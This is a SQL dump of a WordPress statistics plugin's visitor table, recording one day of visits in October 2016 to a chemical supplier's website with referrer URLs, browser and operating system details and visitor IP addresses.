INSERT INTO `wp_statistics_visitor` VALUES (5258, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.41.79', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5259, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.41.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5260, '2016-10-17', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'Unknown', 'Unknown', 'Unknown', '', '184.168.224.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5261, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '48.0', '', '132.3.41.81', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5262, '2016-10-17', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'Unknown', 'Unknown', 'Unknown', '', '184.168.224.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5263, '2016-10-17', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'Unknown', 'Unknown', 'Unknown', '', '184.168.224.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5264, '2016-10-17', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'Unknown', 'Unknown', 'Unknown', '', '184.168.224.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5265, '2016-10-17', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'Unknown', 'Unknown', 'Unknown', '', '184.168.224.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5266, '2016-10-17', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'Unknown', 'Unknown', 'Unknown', '', '184.168.224.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5267, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '75.78.103.8', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5268, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5269, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.130.48.34', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5270, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjArdiWpOLPAhWIZiYKHT-0Az0QFgghMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '207.172.124.61', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5271, '2016-10-17', 'https://www.miller-stephenson.com/', 'Edge', 'Windows', '14.14393', '', '24.218.44.209', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5272, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '108.230.124.239', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5273, '2016-10-17', 'https://www.miller-stephenson.com/krytox/', 'MSIE', 'Windows', '8.0', '', '62.24.181.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5274, '2016-10-17', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/vpf-krytox/', 'MSIE', 'Windows', '8.0', '', '62.24.181.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5275, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.205.101.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5276, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.60.197.211', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5277, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.12.224.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5278, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '50.253.109.203', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5279, '2016-10-17', 'https://www.bing.com/search?q=hexion+epoxy+hardener&src=IE-SearchBox&FORM=IENTTR&conversationid=', 'MSIE', 'Windows', '11.0', '', '73.168.20.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5280, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.250.37.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5281, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5282, '2016-10-17', 'https://www.adsensecustomsearchads.com/afs/ads?q=dry%20lubricant%20spray&adpage=1&ccfn=amazon_search_numbered_wide_underline&r=m&fexp=21404%2C7000107&client=amazon&channel=g-channel-92%2Bg-channel-137%2Bg-channel-330&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&jsei=3&format=n4&ad=n4&nocache=3001476724056725&num=0&output=uds_ads_only&v=3&bsl=10&u_his=6&u_tz=-300&dt=1476724056725&u_w=1280&u_h=1024&biw=-12245933&bih=-12245933&isw=1036&ish=1&psw=1036&psh=0&frm=2&uio=uv3-&jsv=10306&rurl=httpss%3A%2F%2Fd14qd3he45186l.cloudfront.net%2Fads-search32.html&referer=www.amazon.com', 'Edge', 'Windows', '14.14393', '', '184.12.217.228', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5283, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '24.63.154.108', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5284, '2016-10-17', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.3', '', '166.137.244.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5285, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5286, '2016-10-17', 'https://mmr.mschem.com/miller/pdf/MS-381HC,%20383H.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '172.16.36.70', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5287, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '10.173.151.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5288, '2016-10-17', 'https://www.google.com.mx/', 'Chrome', 'Windows', '53.0.2785.143', '', '189.247.1.157', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5289, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.88.6.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5290, '2016-10-17', 'https://www.google.com/search', 'Chrome', 'Linux', '27.0.1453', '', '24.63.154.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5291, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5292, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '199.243.212.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5293, '2016-10-17', 'https://www.miller-stephenson.com/miller/conformal_coating.html', 'MSIE', 'Windows', '9.0', '', '182.118.22.229', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5294, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '39.0', '', '23.82.186.119', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5295, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.167.101.48', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5296, '2016-10-17', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '69.70.40.2', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5297, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '10.192.145.98', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5298, '2016-10-17', 'https://chemicalengineering.hotims.com/r5/search.asp?return_by_category=y&action=search-eresp&s_type=&pub_id=224&order_by=&rows_per_page=1000&mc=ChemEng_June2016&email=ciro_henrique14%40hotmail.com&eresponse=1&category_id=52039&category_id=52041&category_id=52037&category_id=52040&category_id=52028&category_id=52035&category_id=52038&category_id=52036&category_id=52034', 'Chrome', 'Windows', '53.0.2785.143', '', '189.34.156.245', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5299, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.192.145.46', '000', 34, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5300, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '207.238.166.197', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5301, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '130.76.24.19', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5302, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '149.32.192.41', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5303, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.94.112.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5304, '2016-10-17', 'https://www.google.es/', 'Edge', 'Windows', '14.14393', '', '85.54.165.255', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5305, '2016-10-17', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '47.152.59.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5306, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.141.120.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5307, '2016-10-17', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.69.160.170', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5308, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.148.174.137', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5309, '2016-10-17', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '24.97.253.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5310, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj9rbmmt-LPAhUEWSYKHU5LDT8QFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '192.138.178.131', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5311, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.1.134.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5312, '2016-10-17', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwjz8ePVt-LPAhWq5YMKHZXjA2EQFgg5MAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Ftribosys-212x%2F&usg=AFQjCNGYLN4svk2RNeSaL1myvsBx9OZU9A&sig2=tPCpfNtEZCr8zFEsSMgu1w', 'Firefox', 'Windows', '24.0', '', '72.142.19.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5313, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '174.136.133.132', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5314, '2016-10-17', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 21, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5315, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '216.163.53.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5316, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '180.158.125.113', '000', 72, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5317, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwia8KK6ueLPAhUM2IMKHYRjCEoQFggiMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-222N%2C%2520222T.pdf&usg=AFQjCNFZCZI5wPs-cCRMQ4pGlbR-8wR9Tw&sig2=dw-uQsY8jKxM8a1hEb7wAA&bvm=bv.135974163,d.amc&cad=rjt', 'MSIE', 'Windows', '11.0', '', '50.194.136.81', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5318, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '74.92.108.125', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5319, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.233.213.10', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5320, '2016-10-17', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '70.95.74.161', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5321, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.44.81.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5322, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.28.175.60', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5323, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '12.205.160.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5324, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.134.11.36', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5325, '2016-10-17', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5326, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '139.184.223.168', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5327, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5328, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '90.154.75.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5329, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiLxJ_DwOLPAhXKHB4KHToLBPwQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-580582%2F&usg=AFQjCNFPeZBf-lu3w44UOE1nejRxLgrt9A&sig2=g0QJ02SjyfGCzh4CpfxQ-Q&bvm=bv.135974163,d.dmo', 'MSIE', 'Windows', '11.0', '', '72.64.128.49', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5330, '2016-10-17', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '198.168.46.90', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5331, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.75.25.206', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5332, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '71.85.140.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5333, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiJ-omhw-LPAhVs5oMKHZ8WBrUQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=7wN26xgV0_SZqO19L0X56g&bvm=bv.135974163,d.amc', 'MSIE', 'Windows', '11.0', '', '199.241.14.251', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5334, '2016-10-17', 'https://www.adsensecustomsearchads.com/afs/ads?q=Foxfire%20Dry%20Grinding%20Lubricant%20-%2018%20oz%20Tube&adpage=1&ccfn=amazon_search_numbered_wide_underline&r=m&fexp=21404%2C7000108&client=amazon&channel=g-channel-23%2Bg-channel-133%2Bg-channel-330&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&jsei=4&format=n4&ad=n4&nocache=3451476730886918&num=0&output=uds_ads_only&v=3&bsl=10&u_his=12&u_tz=-420&dt=1476730886921&u_w=1280&u_h=720&biw=-12245933&bih=-12245933&isw=1036&ish=1&psw=1036&psh=0&frm=2&uio=uv3-&jsv=10306&rurl=httpss%3A%2F%2Fd14qd3he45186l.cloudfront.net%2Fads-search32.html&referer=www.amazon.com', 'Edge', 'Windows', '14.14393', '', '72.192.166.58', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5335, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.99', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5336, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5337, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.17.127.243', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5338, '2016-10-17', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CDQQFjAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fvazo_overview.html&ei=dyEFWK7BA-f5sAbxmAE&usg=AFQjCNESI5yDu11sJVIRdHyRBsQiHWCyHw', 'Chrome', 'Android', '53.0.2785.124', '', '66.249.88.156', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5339, '2016-10-17', 'https://www.miller-stephenson.com/chemicals/vazo-radical-initiators/', 'Chrome', 'Android', '53.0.2785.124', '', '66.249.88.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5340, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '138.57.212.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5341, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.26.9.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5342, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.230.120.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5343, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '64.73.228.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5344, '2016-10-17', 'https://r.search.yahoo.com/_ylt=A0LEVjRSIwVYez8ARFhjmolQ;_ylu=X3oDMTByNXQ0NThjBGNvbG8DYmYxBHBvcwM1BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1476760530/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fepi-rez-3522-w-60%2f/RK=0/RS=ztpYusYHnosdtOnDP.ndmV9czhs-', 'MSIE', 'Windows', '11.0', '', '137.83.14.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5345, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '67.191.71.60', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5346, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '98.28.138.156', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5347, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '107.204.142.185', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5348, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '213.239.205.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5349, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '68.72.228.37', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5350, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '12.251.123.42', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5351, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.239.205.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5352, '2016-10-17', 'https://www.google.com/afs/ads?q=least%20expensive%20food%20grade%20oil&lo=true&adpage=1&adrep=3&r=m&fexp=21404&client=infospace-syn-pch&channel=pch&hl=en&adsafe=high&type=0&oe=UTF-8&ie=UTF-8&format=p3%7Cn4&ad=n4p3&nocache=6081476732811778&num=0&output=uds_ads_only&v=3&adlh=on&adext=as1%2Cl1%2Csr1&bsl=10&u_his=10&u_tz=-300&dt=1476732811779&u_w=1152&u_h=720&biw=1142&bih=617&psw=1142&psh=1294&frm=0&uio=uv3cs1lo1va1sr1sl1as3-lHwi555ff2st16sd12sv13da0-lhwi555ff2st16sd12sv13da0&jsv=10306&rurl=https%3A%2F%2Fsearch.pch.com%2Fsearch%3Fq%3Dleast%2Bexpensive%2Bfood%2Bgrade%2Boil%26cat%3Dweb&referer=https%3A%2F%2Fsearch.pch.com%2Fsearch%3Fq%3Darena%2Bdust%2Bcontrol%26cat%3Dweb', 'Edge', 'Windows', '14.14393', '', '74.207.173.164', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5353, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.101', '', '68.193.188.205', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5354, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.99.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5355, '2016-10-17', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '180.153.206.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5356, '2016-10-17', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '9.0', '', '73.168.136.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5357, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjBkdnSy-LPAhXRth4KHZ_pD9UQFggiMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '199.46.249.143', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5358, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '66.55.20.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5359, '2016-10-17', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.66.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5360, '2016-10-17', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.3', '', '129.82.78.121', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5361, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&cad=rja&uact=8&ved=0ahUKEwi2z_XKzuLPAhUErB4KHRujBh8QFggnMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-381hc%2F&usg=AFQjCNErYk6mGXUb_JqrkGeFfbhYjyzOJg&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '199.46.249.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5362, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '50.0.2661.89', '', '70.211.12.1', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5363, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.116', '', '216.165.95.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5364, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '158.69.225.34', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5365, '2016-10-17', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '17.0.1025.133', '', '158.69.225.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5366, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.17.0.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5367, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '70.59.252.185', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5368, '2016-10-17', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiUw-DE0-LPAhVDPYEKHTPHAtEYABAE&ei=GzEFWMONM8vBmwHG47LACg&sig=AOD64_04kY_aRPy9mUIKipMET4wC7EubQw&ctype=4&rct=j&q=&sqi=2&ved=0ahUKEwiDh9zE0-LPAhXL4CYKHcaxDKgQwgUIJCgD&adurl=', 'MSIE', 'Windows', '11.0', '', '107.77.64.53', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5369, '2016-10-17', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.68.90.185', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5370, '2016-10-17', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '3.0.4', '', '24.63.154.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5371, '2016-10-17', 'https://www.bing.com/images/search?q=chart+of+all+conformal+coatings+&view=detailv2&adlt=strict&id=96D7D23AA0B6806666AE3E34D9B6D7FC75B336B6&selectedIndex=12&ccid=6nA6JEdP&simid=607996649666842494&thid=OIP.Mea703a24474fef2d7a749300962b7484o0&mode=overlay', 'MSIE', 'Windows', '11.0', '', '157.127.124.157', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5372, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '97.101.155.83', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5373, '2016-10-17', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.47.34.172', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5374, '2016-10-17', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '199.241.14.251', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5375, '2016-10-17', 'https://www.google.co.nz/', 'Chrome', 'Windows', '53.0.2785.143', '', '130.123.103.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5376, '2016-10-17', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjuhZr32eLPAhWJQD4KHfdnAusQFgg6MAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvertrel-x-si%2F&usg=AFQjCNHbQr-AhffmHTRmJoRFsQKoBXPqqQ', 'MSIE', 'Windows', '11.0', '', '173.11.149.236', '000', 2, 0); 
